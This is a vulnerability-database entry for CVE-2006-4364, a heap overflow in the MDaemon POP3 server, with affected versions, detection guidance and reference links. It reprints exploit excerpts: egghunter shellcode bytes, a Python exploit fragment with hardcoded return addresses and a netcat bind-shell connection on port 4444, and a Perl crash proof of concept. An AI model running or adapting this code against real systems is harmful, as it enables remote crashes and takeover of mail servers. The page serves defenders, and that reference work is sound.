CVE-2006-4364
published 2006-08-27CVE-2006-4364: Multiple heap-based buffer overflows in the POP3 server in Alt-N Technologies MDaemon before 9.0.6 allow remote attackers to cause a denial of service (daemon…
PriorityP343medium5CVSS 2.0
AVNACLAuNCNINAP
EXPLOIT
EPSS
54.62%
98.9th percentile
Multiple heap-based buffer overflows in the POP3 server in Alt-N Technologies MDaemon before 9.0.6 allow remote attackers to cause a denial of service (daemon crash) and possibly execute arbitrary code via long strings that contain '@' characters in the (1) USER and (2) APOP commands.
Affected
44 ranges· showing 25
| Vendor | Product | Version range | Fixed in |
|---|---|---|---|
| alt-n | mdaemon | — | — |
| alt-n | mdaemon | — | — |
| alt-n | mdaemon | — | — |
| alt-n | mdaemon | — | — |
| alt-n | mdaemon | — | — |
| alt-n | mdaemon | — | — |
| alt-n | mdaemon | — | — |
| alt-n | mdaemon | — | — |
| alt-n | mdaemon | — | — |
| alt-n | mdaemon | — | — |
| alt-n | mdaemon | — | — |
| alt-n | mdaemon | — | — |
| alt-n | mdaemon | — | — |
| alt-n | mdaemon | — | — |
| alt-n | mdaemon | — | — |
| alt-n | mdaemon | — | — |
| alt-n | mdaemon | — | — |
| alt-n | mdaemon | — | — |
| alt-n | mdaemon | — | — |
| alt-n | mdaemon | — | — |
| alt-n | mdaemon | — | — |
| alt-n | mdaemon | — | — |
| alt-n | mdaemon | — | — |
| alt-n | mdaemon | — | — |
| alt-n | mdaemon | — | — |
Detection & IOCsextracted from sources · hover to see the quote
commandUSER @[email protected] (326 B's) - heap overflow trigger via USER command with @ characters↗
bytes↗
egghunter: \xeb\x21\x59\xb8\x74\x30\x30\x77\x51\x6a\xff\x33\xdb\x64\x89\x23\x6a\x02\x59\x8b\xfb\xf3\xaf\x75\x07\xff\xe7\x66\x81\xcb\xff\x0f\x43\xeb\xed\xe8\xda\xff\xff\xff\x6a\x0c\x59\x8b\x04\x0c\xb1\xb8\x83\x04\x08\x06\x58\x83\xc4\x10\x50\x33\xc0\xc3
bytes↗
egg tag: \x90\x90\x74\x30\x30\x77\x74\x30\x30\x77 (t00wt00w)
- →Detect heap overflow attempts against MDaemon POP3 server via USER command containing repeated '@' characters — a long USER argument with '@' is the primary attack signature for CVE-2006-4364. ↗
- →Alert on POP3 USER commands exceeding normal length thresholds (e.g., >160 repetitions of '@A') on TCP port 110 targeting MDaemon. ↗
- →Detect the egghunter tag 't00wt00w' (bytes \x74\x30\x30\x77\x74\x30\x30\x77) in POP3 USER command payloads as an indicator of the exploit shellcode stage. ↗
- →Monitor for bind-shell connections on port 4444 originating from the MDaemon process following exploitation. ↗
- →Repeated rapid TCP connections to port 110 in a loop (e.g., 5+ connections in quick succession) sending oversized USER commands may indicate exploit looping behavior. ↗
- ·The RET and UEH gadget addresses are specific to Windows 2000 SP4 with no patches applied; these hardcoded addresses will not work on other OS versions or patch levels. ↗
- ·The exploit targets MDaemon versions prior to 9.0.6; systems running 9.0.6 or later are not vulnerable. ↗
CVEs like this are exactly what “Exploited This Week” covers.
Every Monday: what got weaponized or added to CISA KEV in the last seven days — each CVE cross-linked to its PoC, Nuclei template, and detection rule. Free, one email a week, unsubscribe in one click.
No detection rules found.
Exploit-DB
Alt-N MDaemon POP3 Server < 9.06 - 'USER' Remote Heap Overflow
exploitdb·2006-08-26
CVE-2006-4364 Alt-N MDaemon POP3 Server < 9.06 - 'USER' Remote Heap Overflow
Alt-N MDaemon POP3 Server nc -v 192.168.220.128 4444
# 97DACBEC7CA4483 [192.168.220.128] 4444 (?) open
# Microsoft Windows 2000 [Version 5.00.2195]
# (C) Copyright 1985-2000 Microsoft Corp.
#
# C:\MDaemon\APP>
########################################################################################
host="192.168.220.128"
ret = struct.pack("<L",0x7c2f62b6) # 7c2f62b6 advapi.dll JMP ESI+48 SP4 No Patches
ueh = struct.pack("<L",0x7C54144C) # SetUnhandledExceptionFilter 0x7C54144C win2k SP4 No Patches
tap = struct.pack("<L",0xeb169090) # Short Jump over some garbage
# skape's egghunter shellcode
egghunter ="\xeb\x21\x59\xb8\x74\x30\x30\x77\x51\x6a\xff\x33\xdb\x64\x89\x23"
egghunter +="\x6a\x02\x59\x8b\xfb\xf3\xaf\x75\x07\xff\xe7\x66\x81\xcb\xff\x0f"
egghunter +="\x43\xeb\xed\xe8\xda\xff\xff
Exploit-DB
MDaemon POP3 Server < 9.06 - 'USER' Remote Buffer Overflow (PoC)
exploitdb·2006-08-22
CVE-2006-4364 MDaemon POP3 Server < 9.06 - 'USER' Remote Buffer Overflow (PoC)
MDaemon POP3 Server
# Infigo IS
#
#
$host = '192.168.0.105';
use IO::Socket;
for ($x = 0 ; $x $host,PeerPort => '110', Proto => 'tcp')
|| die "socket error\n\n";
recv ($sock, $var, 10000,0);
print $var;
print $sock "USER " . "\@A" x 160 . "\r\n";
recv ($sock, $var, 10000,0);
print $var;
print $sock "QUIT\r\n";
recv ($sock, $var, 10000,0);
print $var;
close ($sock);
sleep(1);
}
$sock = new IO::Socket::INET (PeerAddr => $host,PeerPort => '110', Proto => 'tcp')
|| die "socket error\n\n";
recv ($sock, $var, 10000,0);
print $var;
print $sock "USER " . "\@A\@A" . "B" x 326 . "\r\n";
recv ($sock, $var, 10000,0);
print $var;
print $sock "USER " . "\'A" x 337 . "\r\n";
recv ($sock, $var, 10000,0);
print $var;
sleep(2);
# milw0rm.com [2006-08-22]
No writeups or analysis indexed.
http://files.altn.com/MDaemon/Release/RelNotes_en.txthttp://secunia.com/advisories/21595http://securityreason.com/securityalert/1446http://securitytracker.com/id?1016729http://www.infigo.hr/en/in_focus/advisories/INFIGO-2006-08-04http://www.osvdb.org/28125http://www.securityfocus.com/archive/1/444015/100/0/threadedhttp://www.securityfocus.com/bid/19651http://www.vupen.com/english/advisories/2006/3361https://exchange.xforce.ibmcloud.com/vulnerabilities/28517https://www.exploit-db.com/exploits/2245http://files.altn.com/MDaemon/Release/RelNotes_en.txthttp://secunia.com/advisories/21595http://securityreason.com/securityalert/1446http://securitytracker.com/id?1016729http://www.infigo.hr/en/in_focus/advisories/INFIGO-2006-08-04http://www.osvdb.org/28125http://www.securityfocus.com/archive/1/444015/100/0/threadedhttp://www.securityfocus.com/bid/19651http://www.vupen.com/english/advisories/2006/3361https://exchange.xforce.ibmcloud.com/vulnerabilities/28517https://www.exploit-db.com/exploits/2245
2006-08-27
Published